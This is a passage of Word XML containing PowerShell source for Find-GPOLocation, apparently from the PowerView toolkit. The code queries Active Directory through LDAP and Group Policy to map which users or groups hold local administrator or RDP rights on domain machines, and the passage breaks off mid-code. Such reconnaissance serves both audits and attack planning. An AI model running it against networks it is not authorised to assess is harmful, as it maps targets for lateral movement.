        <w:t xml:space="preserve">        Optional domain the user exists in for querying, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F90D9AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="52FBAF78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C875E78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="103FED33" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7B7B90" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F4052CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER LocalGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B55652" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="44BD4515" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The local group to check access against.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C10006F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CED78F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        or a custom local SID. Defaults to local 'Administrators'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D458E7E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="307842A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A0DF93" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="06ADD004" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Mount any found policy files with temporary PSDrives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5511D31D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="27DCD914" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E808A10" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="043D71B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443F39AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="48940899" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721AA740" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="038F4202" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Find-GPOLocation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E3EEAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2847C27B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Find all user/group -&gt; machine relationships where the user/group is a member</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FCB08A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        of the local administrators group on target machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700D7F63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="50DCF053" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FC87A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="60EBFF68" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Find-GPOLocation -UserName dfm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B22367" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45051277" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Find all computers that dfm user has local administrator rights to in </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA23638" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6006FE20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="074FEE2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20708140" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="171B2C60" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Find-GPOLocation -UserName dfm -Domain dev.testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0882143A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014EB523" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Find all computers that dfm user has local administrator rights to in </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4387BECE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        the dev.testlab.local domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AFBC6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="75DC93DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A215F33" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5D4E002B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Find-GPOLocation -UserName jason -LocalGroup RDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146946E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D1676E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Find all computers that jason has local RDP access rights to in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D79AF30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7042C889" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4D141299" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161A67E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E10C71D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B34DDF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBF2F8A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A8F9E92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C30DEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GroupName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF9EA21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4197D432" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B464B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B87D509" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="65048220" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7900E6E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A63D1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E82CF8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6174DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $LocalGroup = 'Administrators',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CD5346" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24006A31" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF69166" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UsePSDrive,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1434C75B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="47D0A49B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A47B124" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B637BF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52974397" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1008CCAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3CA0D400" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($UserName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F1E4F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if a group name is specified, get that user object so we can extract the target SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE9667D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $User = Get-NetUser -UserName $UserName -Domain $Domain -DomainController $DomainController -PageSize $PageSize | Select-Object -First 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470DC14C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserSid = $User.objectsid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BD5786" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7BD3A47D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(-not $UserSid) {    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015A5683" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Throw "User '$UserName' not found!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B57FE3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF7E5F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="033DB9B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetSIDs = @($UserSid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720A542B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ObjectSamAccountName = $User.samaccountname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114BDE0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetObject = $UserSid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2691E181" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4584CA5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif($GroupName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1254039E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if a group name is specified, get that group object so we can extract the target SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1B6FDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $Group = Get-NetGroup -GroupName $GroupName -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize | Select-Object -First 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039F0BE4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GroupSid = $Group.objectsid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0797C974" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="65180D47" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(-not $GroupSid) {    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C24817" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Throw "Group '$GroupName' not found!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46547864" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319B6C98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32A1DC03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetSIDs = @($GroupSid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06821BEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ObjectSamAccountName = $Group.samaccountname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4876662F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetObject = $GroupSid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013AE20F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFF09C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3526F734" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetSIDs = @('*')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E65803" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CB47ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="16932AF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # figure out what the SID is of the target local group we're checking for membership in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E3ED5F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($LocalGroup -like "*Admin*") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11160C5D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetLocalSID = 'S-1-5-32-544'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E4FDC4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE8019A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif ( ($LocalGroup -like "*RDP*") -or ($LocalGroup -like "*Remote*") ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9229AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetLocalSID = 'S-1-5-32-555'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71554BDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704BD604" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif ($LocalGroup -like "S-1-5-*") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285E3FFB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetLocalSID = $LocalGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C942A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0E9234" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500B9BB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        throw "LocalGroup must be 'Administrators', 'RDP', or a 'S-1-5-X' SID format."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6860EE74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A8BC78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="095329C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # if we're not listing all relationships, use the tokenGroups approach from Get-NetGroup to </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567582A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # get all effective security SIDs this object is a part of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7521A9E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($TargetSIDs[0] -and ($TargetSIDs[0] -ne '*')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277F6147" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetSIDs += Get-NetGroup -Domain $Domain -DomainController $DomainController -PageSize $PageSize -UserName $ObjectSamAccountName -RawSids</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC3A55A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AB4F40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F0C371F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if(-not $TargetSIDs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AB772D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        throw "No effective target SIDs!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1707EE2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26487B8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="45B8B633" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Write-Verbose "TargetLocalSID: $TargetLocalSID"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A32A488" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Write-Verbose "Effective target SIDs: $TargetSIDs"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DEE5B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="791FCEC2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $GPOGroupArgs =  @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544BDF89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'Domain' = $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCB7CBB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'DomainController' = $DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027D1CB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'UsePSDrive' = $UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C2E828" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'ResolveMemberSIDs' = $True</w:t>
      </w:r>
    </w:p>
